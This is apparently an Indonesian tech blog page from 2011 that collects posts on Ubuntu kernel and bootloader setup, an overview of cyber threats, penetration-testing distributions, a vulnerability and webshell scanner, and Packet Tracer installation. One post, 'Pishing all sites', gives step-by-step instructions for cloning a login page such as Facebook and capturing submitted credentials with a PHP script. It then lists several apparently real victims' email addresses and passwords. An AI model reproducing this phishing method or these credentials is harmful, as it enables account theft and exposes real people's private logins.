Wednesday, September 7, 2011

Memasang kernel 3.0.0 di Ubuntu Natty

,
Setelah di rilis oleh Linuz trovalds kernel 3.0 sudah mendarat di Oneiric, namun sayangnya ooneiric belum dirilis hingga saat ini :( . Berbekal modal nekat dan mumpung punya waktu luang, akhirnya saya membackport kernel 3.0 ke natty. Sebenarnya ini untuk LTS yaitu lucid, namun setelah saya test semua berjalan dengan lancar. Berikut adalah cara memasang kernel tersebut dari PPA saya.
$ sudo add-apt-repository ppa:udienz/lucid-bpo

$ sudo apt-get update

$ sudo apt-get install linux-headers-3.0.0-8-generic linux-image-3.0.0-8-generic

$ sudo reboot
Done! Gampang kan? untuk memastikan silakan cek dengan perintah uname -a
~ $ uname -a
Linux cvbn45 3.0.0-8-generic #11~natty1-Ubuntu SMP Tue Aug 23 20:03:27 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
~ $
Atau cek di system monitor :) Selamat anda sudah memasang kernel 3.0!

Article source
Read more

Ancaman-Ancaman Dunia Cyber

,
Kebutuhan kita untuk mendapatkan informasi melalui internet saat ini semakin tinggi. Namun, masih banyak yang belum menyadari akan ancaman atau serangan apabila kita menggunakan IT. Kita baru sadar setelah data menjadi hilang, terkena virus, spyware, spam bahkan sampai komputer menjadi rusak dan tidak bisa digunakan lagi. Saat ini berbagai serangan terhadap jaringan komputer dan internet semakin banyak dan berkembang. Serangan tidak hanya terhadap invidivu tertentu.
Ada serangan yang sengaja dilakukan oleh seseorang atau kelompok tertentu terhadap suatu perusahaan/lembaga untuk kepentingan pribadi mereka. Masih lemahnya sistem suatu perusahaan membuat mereka semakin berkembang dalam membuat teknik serangan-serangan baru. Berikut ini macam – macam ancaman atau serangan dari penggunaan IT :
1. Botnet
Deskripsi:
- Terdiri dari dua kata, yaitu BOT (program yang otomatis) dan Net Networking). Jadi botnet merupakan program yang secara otomatis, bekerja dalam network tertentu yang bertujuan untuk mendapatkan “sesuatu” secara brutal, karena semua komputer yang terhubung dalam jaringan akan diserang semuanya secara otomatis.
- Contoh: conficker.vmx. Botnet ini sulit sekali dihilangkan, karena mempunyai fitur autoupdate ke server yang ditunjuk, sehingga conficker ini sulit dilacak dan dihilangkan.
2. Memaksa masuk (Brute Force) dan kamus password (Dictionary)
Deskripsi:
- Menyerang database atau menyerang login prompt yang sedang aktif.
- Brute Force: upaya menemukan password dari account user dengan cara sistematis, mencoba berbagai kombinasi angka, huruf dan simbol.
- Dictionary: upaya menemukan password dengan mencoba berbagai kemungkinan password yang dipakai user dengan kamus password yang sudah didefinisikan sebelumnya.Cara mengatasi:
- Aturan pembuatan password yang kuat, misalnya tidak boleh menggunakan tanggal lahir, nama, password dengan kombinasi huruf dana angka
3. Denial of Service (DoS)
Deskripsi:
- Membuat layanan jaringan jadi mampet.
- Bentuk: mengirim paket data yang besar terhadap suatu server dan memanfaatkan celah yang rentan dari sistem operasi, layanan-2 atau aplikasi-2.
- Akibat serangan: sitem crash atau pemakaian CPU 100 %.
- Jenis-jenis DoS: Distributed Denial of Service (DSoS), Distributed Reflective Denial of Service (DRDoS).
- Contoh akibat serangan: layanan pemesanan selalu gagal atau username tidak bisa login, daftar barang tidak bisa muncul atau sudah dicetak.
4. Identity Teft
Deskripsi:
- Pencurian informasi tentang identitas kita yang dilakukan melalui komputer offline, jaringan LAN, internet maupun melalui transaksi-transaksi dalam kehidupan sehari-hari.
5. Smurf Attack
Deskripsi:
- Membanjiri komputer client dengan sampah.
- Mengirimkan broadcast kepada segmen jaringan sehingga semua node dalam jaringan akan menerima paket broadcast.
- Ada yang menggolongkan sebagai DoS.
6. Ping of Death
Deskripsi:
- Menggunakan tool khusus dengan mengirimkan paket ping oversized yang banyak sekali kepada korbannya.
- Akibatnya: sistem crash, freeze atau reboot.
- Ada yang menggolongkan sebagai DoS.
7. Stream Attack
Deskripsi:
- Mengirim jumlah paket besar menuju port pada sistem korban menggunakan sumber nomor yang random.
- Ada yang menggolongkan sebagai DoS.
8. Spoofing
Deskripsi:
- Seni untuk menjelma menjadi sesuatu yang lain.
- IP address atau node source yang asli diganti IP address atau node source yang lain.
- Contoh: pemalsuan web Paypal
9. Serangan Pembajakan (Man in the Middle)
Deskripsi:
- Mengkomposisikan dua titik link komunikasi dengan jalan: menyusup antara dua party dan para penyerang memposisikan dirinya dalam garis komunikasi dimana dia bertindak sebagai proxy atau mekanisme store and forward.
- Akibat: para penyerang bisa menangkap logon credensial atau data sensitive ataupun mampu mengubah isi pesan dari kedua titik komunikasi.
10. Spamming
Deskripsi:
- Spam merupakan email/newsgroup/pesan diskusi forum yang tak diundang.
- Berupa iklan dari vendor atau bisa berisi kuda Trojan.
- Biasanya datang bertubi-tubi tanpa diminta dan sering kali tidak dikehendaki oleh penerimanya.
- Mirip dengan DoS.
- Cara kerja: pembuat spam akan membuat mailing list dari alamat-alamat email yang ditemukan dari situs-situs terkenal seperti Facebook, Multiply, Friendster dll. Setelah itu file-file akan disebarkan melalui email-email tersebut.
11. Sniffer (Snooping Attact)
Deskripsi:
- Kegiatan user perusak yang ingin mendapatkan informasi atau traffic melalui jaringan.
- Merupakan program penangkap paket data yang bisa di duplikasikan isi paket yang melalui media jaringan ke dalam file.
- Fokus untuk mendapatkan logon credensial, kunci rahasia, password dan lainnya.
- Contoh: menyadap suatu pengiriman program saat memasukkan password dengan tujuan mendapatkan password pengguna atau menduplikasikan program yang dikirimi program.
12. Crackers
Deskripsi:
- User yang ingin merusak sistem.
- Akibat: kegiatan pencurian data/ide, disable system, kompromi keamanan, opini negative public, kehilangan pasar saham, mengurangi keuntungan, kehilangan produktivitas.
- Contoh: seorang pencopy software seperti microsoft.
- Keahlian minimal cracker: bisa membuat program C, C++, atau Perl, memiliki pengetahuan TCP/IP, menguasai sistem operasi UNIX atau VMS, suka mengkoleksi software dan hardware lama.
13. Hacker
Deskripsi:
- Seseorang atau beberapa orang yang ahli dan mengetahui seluk beluk komputer, baik, software, hardware, keamanan atau jaringannya. Sesungguhnya tidak semua hacker melakukan kejahatan, ada hacker yang berfungsi sebagai peneliti dan pengembang dengan cara menelusuri lubang-lubang keamanan sebuah software atau jaringan komputer.
14. Back Door
Deskripsi:
- Serangan dengan sengaja membuka suatu “pintu belakang” bagi pengunjung tertentu, tanpa disadari oleh orang yang menginstall software.
- Contoh: E-bay untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk kartu kredit.
15. Social Engineering
Deskripsi:
- Bentuk serangan yang memanfaatkan sisi kelemahan manusia, misalnya dengan merekayasa perasaan user sehingga user bersedia mengirim informasi kepada hacker untuk selanjutnya digunakan untuk merusak sistem.
- Misalnya: email yang meminta target untuk membuak attachment yang disisipi worm/trojan horse untuk merusak jaringan.
16. DNS Poisoning
Deskripsi:
- Usaha merubah atau merusak isi DNS sehingga semua akses yang memakai DNS akan disalurkan ke alamat yang salah atau alamat yang dituju tidak bisa diakses.
- User melakukan login ada rekening internetnya. Karena sudah dialihkan, maka ia mengakses ke suatu situs palsu yang serupa dan telah dipersiapkan oleh hacker.
17. Phising Mail
Deskripsi:
- Email yang seolah-olah dikirim dari bank tempat kita menyimpan uang, dari situs tempat kita membeli barang secara online. Bila kita log ini ke dalam situs gadungan tersebut maka situs itu akan mencuri username dan password yang akan merugikan kita.
- Berasal dari bahasa Inggris yang berari pengelabuhan. Phishing berupa webpage yang alamatnya mirip dengan web aslinya. Misalnya: www.klikbca.com diubah menjadi www.clickbca.com atau www.klikkbca.com. Jika dilihat ketiganya memiliki pelafalan yang sama, tetapi tujuannya berbeda. Klik BCA bertujuan untuk mengakses suatu alamat bank swasta di Indonesia, tetapi click BCA bertujuan ke suatu komputer dimana pemiliknya mengetahui username dan password Anda jika Anda memasuki web tersebut.
18. Adware
Deskripsi:
- Kependekan dari advertising software, yaitu sebuah program untuk mengiklankan sesuatu yang dapat secara otomatis tampil dalam web browser atau pop up.
- Adware bisa terdownload tanpa sengaja bila kita tidak teliti saat mengeklik iklan yang tampil dalam sebuah pop-up.
- Ada yang menyamakan dengan spyware.
19. Virus dan Worm
Deskripsi:
- Program komputer aktif yang tersembunyi dan membahayakan, karena bersifatt merusak sistem komputer. Virus dapat menginfeksi program komputer lain atau file data serta dapat terdistribusi ke komputer lain dengan membonceng pendistribusian file/program lain.
20. Spyware
Deskripsi:
- Merupakan program komputer yang biasanya tanpa sengaja terinstall untuk melakukan perusakan, penyalinan dan/atau pengintipan aktifitas sebuah komputer, sehingga segala aktifitas saat menggunakan komputer dapat dipantau, dicopy dari tempat lain. Spyware biasanya terinstall karena ketidaktelitian pengguna komputer saat menegklik suatu pop-up atau browsing internet
21. Remote Attack
Deskripsi:
- Segala bentuk serangan terhadap suatu sistem dimana penyerangannya tidak memiliki kendali terhadap mesin tersebut karena dilakukan dari jarak jaruh di luar sistem jaringan atau media transmisi.
22. Hole
Deskripsi:
- Kondisi dari software atau hardware yang bisa diakses oleh pemakai yang memiliki otoritas atau meningkatnya tingkat pengaksesan tanpa melalui proses otoritasi.
23. Phreaking
Deskripsi:
- Perilaku menjadikan pengamanan telepon melemah.
24. Wireless Attack
Deskripsi:
- Biasanya berbentuk pencurian bandwidth
25. HTTPD Attack
Deskripsi:
- Memanfaatkan kerawanan webserver, misalnya: buffer, overflows, httpd bypasses, cross scripting, web code vulnerabilities, URL floods.
- Contoh: melalui cross XSS seorang attacker bisa mengeksploitasi pertukaran cookies antara browser dan webserver. Fasilitas ini dapat mengaktifkan script untuk merubah tampilan web dll. Script ini bisa menjalankan malware, membca informasi penting dan mengexpose data sensitive seperti nomor credit card dan password.
26. Pencurian Cookie
Deskripsi:
- Cookie adalah kumpulan data yang dikirimkan oleh server atau admin sebuah website kepada webbrowser yang digunakan. Kemudian web browser akan mengembalikan lagi data tersebut untuk mengakses website tanpa ada perubahan sedikitpun.
- Kenapa berbahaya ? Untuk mengakses sbuah situ dibutuhkan transfer cookie dari user ke server dan sebaliknya, sebagai proses authentifikasi dan enkripsi data sekaligus konfirmasi identitas user. Sehingga jika cookie dicuri, maka pencuri dapat menggunakan cookie tersebut untuk mengakses situs ilegal maupun memalsukan identitasnya.
- Pencurian cookie dapat menggunakan script.


Source: Blackc0de
Read more

Pishing all sites...!!!

,
Langsung aja, cekibrot :

1. Niat
2. Harus punya domain & hostingan sendiri (boleh free / premium)
3. Cari site yang mau di pishing
4. Terus liat SC nya (Ctrl+u / klick kanan - view page sourch)
5. di save sebagai index.htm
6. buka index.htm tadi, lalu cari action=, nanti akan ketemu seperti ini
PHP Code:
form action="site yang kita pishing" method="post"
7
. Ganti url "site yang kita pishing" menjadi "write.php" & "post" menjadi "get"
8. lalu saveLangkah selanjutnya
~ bikin write.php di notepad
~ lalu copas code ini :
PHP Code:
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

~ lalu save sebagai "write.php"
~ ubah http://bebas menjadi site yg kita pishing Contoh : http://facebook.com (supaya keliatan kayak FB asli) kwokwokowow ngakak

Langkah akhir :
~ Upload ke 2 file tersebut ke hostingan & di simpan di directori yg sama

NB :
~ Apabila tidak ada file passwords.txt, silahkan buat sendiri & taruh di host (biasanya suka ada otomatis)
~ Chmod passwords.txt ke 777

Hasil nya akan seperti ini :
PHP Code:
charset_test=€,´,€,´,水,Д,Є
lsd=Vgv-w
locale=id_ID
email=ryanankgokil@yahoo.com
pass=oyonthita
default_persistent=0


charset_test=€,´,€,´,水,Д,Є
lsd=Vgv-w
locale=id_ID
email=adiitrikudo@yahoo.com
pass=aditsinaga
default_persistent=0

charset_test=€,´,€,´,水,Д,Є
lsd=Vgv-w
locale=id_ID
email=coeberman@ymail.com
pass=cubercanibalmegacanibal77
default_persistent=0

charset_test=€,´,€,´,水,Д,Є
lsd=Vgv-w
locale=id_ID
email=yunitavera56@yahoo.co.id
pass=yunitart5
default_persistent=0

charset_test=€,´,€,´,水,Д,Є
lsd=Vgv-w
locale=id_ID
email=dwyansapoetra
pass=4926987
default_persistent=0

charset_test=€,´,€,´,水,Д,Є
lsd=Vgv-w
locale=id_ID
email=annisa.nurfitri92@yahoo.com
pass=chadensta
default_persistent=0
Read more

Lucid Desktop (Sistem Operasi Berbasis Web)

,
Gara-gara javascript framework seperti jquery, hal yang tidak mungkin dari PHP menjadi sesuatu yang mungkin. Konsep yang gila sekalipun bisa jadi sesuatu yang nyata. Salah satu konsep gila adalah, membuat sistem operasi berbasis web dengan PHP dan javascript framework, Lucid Desktop adalah sistem operasi open source berbasis web yang di buat menggunakan MySQL dan Javascript Framework.

Lucid Desktop merupakan sistem operasi yang multi user, dan tentunya memiiliki modul untuk membuat aplikasi dan menginstallnya untuk dapat digunakan di sistem operasi ini. Standarnya aplikasi yang sudah terinstall dalam sistem operasi berbasis web ini adalah text editor, calculator, image viewer, simple games, web browser, feed reader, music player dan lain lain, tampilannya benar-benar linux gnome sekali kalo menurut ane om.

Yang menariknya adalah file managernya sangat mantap, dengan file manager layaknya windows eplorer anda dapat menambahkan, edit, dan delete file ataupun folder, benar-benar keren, yang lebih hebat lagi, lucid pun memiliki fitur untuk update OS dengan versi yang paling akhir.

ingin mencobanya gan ?? Klik saja http://www.lucid-desktop.org/demo/

atau ingin mendownloadnya ? http://www.lucid-desktop.org/download/

source : blackc0de
Read more

PERBEDAAN STANDBY, SHUTDOWN, DAN HIBERNATE

,

Di dalam SISTEM OPERASI WINDOWS, disediakan 3 pilihan untuk menentukan keadaan KOMPUTER ( COMPUTER STATE ), yaitu :
  1. STANDBY
  2. SHUTDOWN
  3. HIBERNATE
Hanya saja tidak semua orang tahu keadaan apa yang terjadi pada KOMPUTER ketika kita memilih salah satu dari tiga pilihan diatas. Berikut akan dijelaskan PERBEDAAN antara ke-tiga pilihan diatas :

1. STANDBY

Ketika kita memilih MENU ini, WINDOWS akan membuat keadaan komputer dalam keadaan HEMAT ENERGI. Hemat energi disini maksudnya adalah, KOMPUTER dinyalakan dengan menggunakan LISTRIK SEMINIM MUNGKIN. Hal yang biasa terjadi ketika komputer dalam keadaan STANDBY adalah monitor dalam keadaan mati ( tidak menampilkan gambar ). Pada keadaan STANDBY, komputer menunggu respon dari USER agar kembali seperti semula atau kembali ke keadaan NORMAL. Responnya diantara lain adalah gerakan MOUSE dan AKSES KEYBOARD ( kita menekan tombol di keyboard ).

2. SHUTDOWN

Pilihan SHUTDOWN sepertinya semua orang sudah tau fungsi dan apa yang terjadi pada komputer ketika kita memilih pilihan ini. Komputer akan mati ( off ) ketika kita memilih SHUTDOWN. SEMUA memory volatile akan hilang karena tidak ada listrik yang menyala ( contohnya RAM ).

3. Hibernate

Pilihan HIBERNATE membuat komputer mati ( off ) seperti pada pilihan SHUTDOWN. Namun ada yang berbeda dalam pilihan ini, yaitu sebelum komputer dalam keadaan off, memori-memori yang ada di RAM ( VOLATILE MEMORY ), di copy semua ke dalam HARDISK ( NON-VOLATILE MEMORY ). Maksud dari pernyataan ini adalah semua aktifitas kita ( memori-memori aplikasi yang sedang kita buka, seperti word dll ) akan disimpan dalam HARDISK. Dan ketika kita nyalakan kembali KOMPUTER kita, RAM akan meminta kepada HARDISK memori-memori yang tadi tersimpan, sehingga nantinya booting akan lebih cepat karena RAM sudah memiliki memori yang dibutuhkan untuk masuk ke WINDOWS. Juga aplikasi-aplikasi yang tadi kita gunakan ( sebelum di-HIBERNATE ) akan langsung terbuka begitu masuk ke WINDOWS.

Article source
Read more

Download BackTrack 5 (Revolution)

,
BackTrack 5, distribusi Linux yang paling ditunggu di dunia telah resmi dirilis kemarin.

Dijuluki Revolution, BackTrack 5 kini didasarkan pada Ubuntu 10.04 LTS (Lucid Lynx), ditenagai kernel Linux 2.6.38 yang telah dipatch dengan semua patch wireless injection yang relevan dan memuat beberapa perbaikan besar.

“The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code name “revolution”. Today, we are proud to release our work to the public, and then rest for a couple of weeks.”

“This new revision has been built from scratch, and boasts several major improvements over all our previous releases.” – Dinyatakan dalam pengumuman rilis.

Rangkuman BackTrack 5:
  • Berdasarkan Ubuntu 10.04 LTS;
  • Kernel Linux 2.6.38 (dengan patch wireless injection);
  • KDE 4.6;
  • GNOME 2.6;
  • Mendukung arsitektur 32-bit dan 64-bit;
  • Metasploit 3.7.0;
  • Forensics mode;
  • Stealth mode (tanpa menggenerate lalulintas jaringan);
  • Initial ARM image of BackTrack (untuk perangkat Android);
  • Dan banyak lagi lainnya…
BackTrack 5 – Screenshot

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia3OfLmBkTsHGusfq1Wak4HU0RNYWf5HCkCbEV6Z_9XhlHaJ3T0_lY5sYl3FK3acTjlUmZaakABkjFjfPSz88cghvIXoSTB1LSs6kYT5iig8UzUOul6rfbN2Nq3ooxsR2yTfjg75TDauY/s400/bt5-0.png

Bagi pengguna BackTrack 4 dipastikan harus segera mengupgrade ke versi baru ini, karena mulai 10 Mei 2011, BackTrack 4 tidak lagi mendapat dukungan teknis.

BackTrack 5 – Distribusi Pengujian Penetrasi dari Offensive Security pada Vimeo.

Tentang BackTrack

BackTrack adalah distribusi Live DVD Linux populer yang berfokus pada pengujian penetrasi sistem dan jaringan, menampilkan analisis dan aplikasi diagnostik yang dapat dijalankan langsung dari CD. BackTrack berasal dari distribusi Whax dan Auditor Security Collection, menggabungkan yang terbaik dari keduanya dalam satu solusi lengkap.

Download BackTrack 5: yg koneksinya agak lemot,ane kasih link download localan aja yak
Read more

Recovery Grub Yang Hilang Setelah Install Windows

,
Untuk Yang mash bingung recovery grub pada ubuntu 10.10 setalah install windows, caranya sangat mudah. yang dibutuhkan adalah LiiveCD ubuntu 10.10. langsung saja, booting dari LiveCD. masuk ke terminal login sebagai root :

$ sudo su

Cari partisi ubuntu dengan perintah :

$ fdisk -l

Disitu akan kelihatan partisinya, contah pada gambar dibawah :
Pada gambar diatas, partisi linux berada pada /dev/sda1. Buat directory untuk memanipulasi ubuntu anda dengan perintah :

$ mkdir /media/root

Langkah selanjutnya, mount /dev/sda1 pada directory /media/root dengan perintah :

$ mount /dev/sda1 /media/root

Jika sudah berhasil mount directory tersebut, lalu install grub dengan perintah :

$ grub-install --root-directory=/media/root /dev/sda

Jika semua langkah sudah benar, maka tidak ada pesan error dan yag ada pesan "finish and no error report"
Reboot ubuntu anda, maka secara otomatis grub langsung masuk ke ubuntu an tidak dapat mengakses windows, setelah masuk ke ubuntu. buka terminal dan login sebagai root dan update grub :

$ sudo su
$ update-grub

Sekarang grub pada ubuntu anda sudah seperti semula. selamat mencoba...
Read more

Blackbuntu - Penetration Testing Distribution

,
Masih sama dengan gnacktrack yaitu Blackbuntu , ya blackbuntu serupa tapi tak sama dengan gnacktrack menurut saya, mungkin hal ini juga dikarenakan Backtrack 4 sudah based debian jadi semakin banyak distro yang bisa anda pilih, backtrack sendiri masih berbasis KDE untuk desktopnya sehingga banyak bermunculan alternatif distro GNOME, contohnya ya Blackbuntu dan Gnacktrack ini.

untuk keunggulannya sendiri saya masih belum mencoba blackbuntu tapi sepertinya patut saya coba. daripada anda ribet-ribet instal aplikasi backtrack di ubuntu anda tidak salah juga anda mencoba os yang satu ini..

silahkan jika anda tertarik untuk menggunakan blackbuntu ini.. karena memang sepertinya patut di coba..

About Blackbuntu
Blackbuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security.

Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It’s currently being built using the Ubuntu 10.10 and work on reference Back|Track. It’s created in our own time as a hobby.

Maintainer Team:
Project Founder & Main Developer: c1ph3r < c1ph3r {at} blackbuntu . com >
Developer: x-c0d3 < x-c0d3 {at} blackbuntu . com >
Developer: mayaseven < mayaseven {at} blackbuntu.com >
Contributor: salary < salary {at} blackbuntu.com >

DOWNLOAD BLACKBUNTU :
http://www.blackbuntu.com/download
http://sourceforge.net/projects/blackbuntu/
Read more

Windows 8

,


Requirements :

Windows 8 x86 / 32-bit Minimum Requirements:

1 GHz or faster processor
1 GB of RAM
16 GB of available disk space
DirectX 9 graphics device with Windows Display Driver Model 1.0 or higher driver

Windows 8 x64 / 64-bit Minimum Requirements :

1 GHz or faster processor
2 GB of RAM
20 GB of available disk space
DirectX 9 graphics device with Windows Display Driver Model 1.0 or higher driver

Download :
Windows 8 Build 7989 x64
Windows 8 Build 7955 x86
Read more

Mari kita lebih peduli pada keamanan komputer

,
Perkembangan komputer sudah sedemikian pesatnya dan sudah banyak dari kita semua yang mulai ketergantungan dengan komputer, selain itu dari sisi perkembangan aplikasi, para developer terlihat banyak yang terus berkompetisi membuat produk yang mudah digunakan dengan fitur yang semakin kompleks. Atas nama waktu dan target maka uji coba program terlihat banyak yang hanya di tes pada fungsinya, keamanan sering menjadi anak tiri.

Bukan hal yang baru melihat banyaknya web yang di hack, aplikasi yang di temukan celahnya dan sebagainya, seharusnya dalam mengembangkan suatu aplikasi kita perlu melakukan proses test termasuk dari sisi keamanan dan itu perlu berjalan dengan baik, jika tidak maka ancaman terhadap keamanan komputer akan semakin besar seiring semakin kompleksnya pada program.

Saat ini tutorial hacking begitu mudah diperoleh, baik disitus-situs hacker, juga di berbagai buku hacking. Ditambah software untuk alat hacking semakin mudah digunakan, contohnya menggunakan Fast-Track (Automated Penetration Testing), secara umum ini mengakibatkan individu-individu yang dikenal sebagai hacker menjadi menurun, tapi justru ancaman semakin naik karena orang dapat mudah menjadi penyerang dan hal ini merupakan ancaman bagi kepentingan umum apalagi ditambah makin banyaknya orang awam yang mulai mengenal komputer tanpa mengetahui bagaimana cara mengamankan komputernya sehingga korban dapat semakin banyak.

Menjadikan Hacking sebagai objek pemikiran maka penulis lebih melihat pada melakukan hacking dengan beretika dan tidak beretika. Untuk yang tidak beretika pengalaman penulis dari jaman dulu sampai saat ini adalah yang paling banyak dilakukan oleh orang ditambah dengan banyak orang yang tidak tahu hingga tidak peduli dengan keamanan komputernya, sehingga sudah bisa ditebak yaitu mereka menjadi target empuk bagi para orang iseng atau orang yang memiliki tujuan khusus.

Di artikel ini penulis mengajak para pengembang untuk lebih memperhatikan sisi keamanan aplikasi yang dibuatnya yang dimana tindakan test tidak hanya pada fungsi saja tapi juga pada sisi keamanan, juga terhadap pengguna aplikasi yang juga perlu lebih memperhatikan sisi keamanan dalam menggunakan aplikasi, jika misalnya ingin menggunakan CMS dengan component tertentu maka paling tidak aplikasi yang akan digunakan diperiksa keamanannya paling tidak secara umum.

Oleh Kurniawan


Article Source
Read more

Download XCode Exploit – Vulnurable & webshell Scanner (update Sept2011)

,

XCode Exploit – Vulnurable & webshell Scanner (SQLI/LFI/XSS/Webshell Hunter with Google Engine). Tool ini akan mengumpulkan Link dari Dork yang dimasukkan lalu menampilkan listnya. setelah selesai menampilkan List, Anda akan bisa melakukan scanning kerentanan SQL injection/Local File Inclusion/XSS pada web yang ada di list. Update terbaru telah dirilis dan dapat didownload di sini

Article Source
Read more

Cara memasang BURG di Ubuntu

,
GRUB (Grand Unified Bootloader) itu pintu masuk sistem operasi yang terpasang di komputer atau laptop kita, dialah yang perama kali menyapa kita setelah komputer/laptop dihidupkan, dia pulalah yang memungkinkan kita menggunakan lebih dari satu sistem operasi di harddisk. Sayangnya GRUB itu berpenampilan kurang menarik, dari dulu dia itu identik dengan hitam dan putih, atau warna-warna lain yang sederhana namun. Belakangan dia sudah mulai berdandan, sebelum GRUB versi 2 kita sudah bisa menambahkan latar belakang berosolusi rendah dan tampak sangat jelek. Kemudian ada Gfxboot yang bikin GRUB lebih hidup. Dan yang terakhir di GRUB versi 2, kita sudah bisa mendandaninya menggunakan gambar berformat jpeg atau png beresolusi tinggi.

Lalu cukupkah sampai di situ? Tentu saja tidak, ada satu proyek yang menyebut dirinya BURG berusaha memberikan make over pada GRUB. Kalau diperhatikan dua nama ini berkebalikan, GRUB jika dibaca dari belakang akan menjadi BURG. Pemilihan nama yang unik, bukan? Salah satu ciri khas yang cukup melekat di komunitas free software. BURG sendiri merupakan kependekan dari “Brand-new Universal loadeR from GRUB”.

Oke deh, cukup sampai di situ dulu ceritanya karena kita punya pekerjaan yang lain. Apa itu? Tentu saja memasang dan mengatur BURG ini di sistem operasi kesayangan kita, Ubuntu. Langkah-langkahnya adalah sebagai berikut.

Tambahkan repositori si BURG dari PPA, mengunakan perintah berikut. Ingat! Perintah ini dijalankan dari terminal emulator, gnome terminal kalau menggunakan Gnome atau konsole kalau menggunakan KDE.

sudo add-apt-repository ppa:bean123ch/burg

Update daftar index repositori kita dan install BURG dengan mengeksekusi perintah berikut
1 sudo apt-get update && sudo apt-get install burg burg-themes
Install BURG ke MBR (Master Boot Record) hard-disk, dengan perintah
1 sudo burg-install "(hd0)"
Terakhir, jangan lupa memutakhirkan BURG
1 sudo update-burg
Untuk memilih tema, silakan reboot komputer/laptop yang kita gunakan. Tekan tombol t di kibor ketika menu GRUB yang sudah berubah menjadi BURG menyapa kita, pilih salah satu tema yang tersedia. Pratilik tema juga bisa kita intip menggunakan
1 burg-emu



article source
Read more

Cara Install Packet Tracer di Ubuntu 10.10 Maverick Meerkat

,

Packet Tracer adalah sebuah software yang dikembangkan oleh Cisco. Dimana software tersebut berfungsi untuk membuat suatu jaringan komputer atau sering disebut dengan Computer network.

Software ini ditujukan untuk pengajaran awal networking sehingga user dapat memahami bagaimana cara kerja suatu networking devices. Bisa dikatakan bahwa packet tracer merupakan program simulasi jaringan, sehingga user dapat membangun jaringan sendiri, mengobservasi “tingkah laku” dari data frame serta paket-paket yang melalui router, switch, dan peralatan lainnya. Tujuan utama kita menggunakan Packet tracer yaitu untuk membantu kita memahami fungsi-fungsi dasar dari berbagai networking devices dan bagaimana peralatan tersebut menghandle frame dan paket-paket.

Salah satu aspek yang paling berharga dari packet tracer ini adalah kemampuan untuk menjalankan simulasi setelah membangun / mendesain jaringan. Uer dapat membuat sebuah jaringan dan membuat beberapa jaringan yang berbeda skenarionya dalam pengiriman paket dari sumber yang berbeda ke tujuan yang berbeda pula. User-pun dapat menyimpan serta membuka file yang telah dibuatnya itu.

Network devices yang dapat didukung oleh packet tracer antara lain :



  1. Router


  2. Cloud


  3. Switch


  4. Bridge


  5. Repeater


  6. Hub


  7. Wireless


  8. Access Point


  9. PC


  10. Server

Interfaces yang dapat didukung oleh packet tracer antara lain:



  1. Ethernet (Copper)


  2. Fast Ethernet ( Copper dan Fiber)


  3. Gigabit Ethernet (Copper dan Fiber)


  4. Serial


  5. Modem


  6. Wireless

Bandwidth yang dapat didukung oleh packet tracer yaitu :



  1. 56 Kbps


  2. 128 Kbps


  3. 384 Kbps


  4. 786 Kbps


  5. 1.544 Mbps


  6. 2.048 Mbps

Langsung saja menuju TKP, soalnya sudah membahas panjang lebar mengenai packet Tracer itu sendiri. Untuk memulai, pertama harus punya dulu software packet Tracer tersebut, kalau belum punya silahkan download di sini. Kapasitasnya sekitar 97, 2 Mb. Ketika proses download telah selesai, taruh file hasil download tersebut di desktop. Kemudian bukalah terminal untuk memulai menginstal Packet Tracer. Jika terminal sudah dibuka, login dulu sebagai root, caranya ketikan perintah berikut pada terminal :

sudo su

Lalu masuka password ubuntu, setelah itu ganti permission file packet tracer. Caranya ketikan perintah berikut pada terminal :

chmod 775 PacketTracer53_i386_installer-deb.bin

Note : saya mengunakan packet Tracer versi 53.

Setelah itu, ekstrak file tracket tracer tersebut dengan cara ketikan perintah berikut di terminal :

./PacketTracer53_i386_installer-deb.bin. Maka akan muncul text seperti berikut:

Self extracting archive…

Welcome to Packet Tracer 5.3 Installation

Read the following End User License Agreement “EULA” carefully. You must accept the terms of this EULA to install and use Packet Tracer 5.3.

Press the Enter key to read the EULA.


Tekan ENTER untuk memulai membaca EULA, kemudian akan muncul text seperti berikut:

Cisco Packet Tracer

Software License Agreement

IMPORTANT: PLEASE READ THIS CISCO PACKET TRACER SOFTWARE LICENSE AGREEMENT (THE

“AGREEMENT”) CAREFULLY. DOWNLOADING, INSTALLING OR USING THE CISCO PACKET

TRACER SOFTWARE CONSTITUTES ACCEPTANCE OF THIS AGREEMENT. IF YOU DO NOT AGREE

TO ALL OF THE TERMS OF THIS AGREEMENT, THEN CISCO SYSTEMS, INC. (“CISCO”) IS

UNWILLING TO LICENSE THE SOFTWARE TO YOU AND YOU ARE NOT AUTHORIZED TO

DOWNLOAD, INSTALL OR USE THE SOFTWARE.


Sebenarnya text di atas, masih banyak sambungannya, namun saya copy hanya judulnya saja.

Setelah itu, tekan SPASI untuk membaca EULA sampai selesai atau 100 % dan kemudian muncul pertanyaan seperti berikut:

Cisco, Cisco Systems, and the Cisco Systems logo are registered trademarks of

Cisco Systems, Inc. in the U.S. and certain other countries. Any other

trademarks mentioned in this document are the property of their respective

owners.

Do you accept the terms of this EULA? (Y)es/(N)o


Tekan Y untuk memulai proses instalasi, tunggu proses instalasi selesai dan akan muncul text seperti berikut :

You have accepted the terms to the EULA. Congratulations. Packet Tracer will now be installed.

Attempting to install package now

Selecting previously deselected package packettracer.

(Reading database … 224842 files and directories currently installed.)

Unpacking packettracer (from PacketTracer-5.3-u.i386.deb) …

Setting up packettracer (5.3) …

Installed files. Please wait for post-install operations to finish..

gtk-update-icon-cache: Cache file created successfully.

Writing PT5HOME environment variable to /etc/profile

Processing triggers for man-db …

Processing triggers for gnome-icon-theme …


Jika proses instalasi diatas telah selesai, masuk saja ke menu Application -> Internet -> Cisco Packet Tracer. Setelah itu maka akan muncul jendela seperti berikut, namun langsung klik yes saja.


Setelah itu, akan muncul halaman dimana kita akan bekerja.


article source
Read more

INSECT Pro 2.7 - Penetration testing tool

,


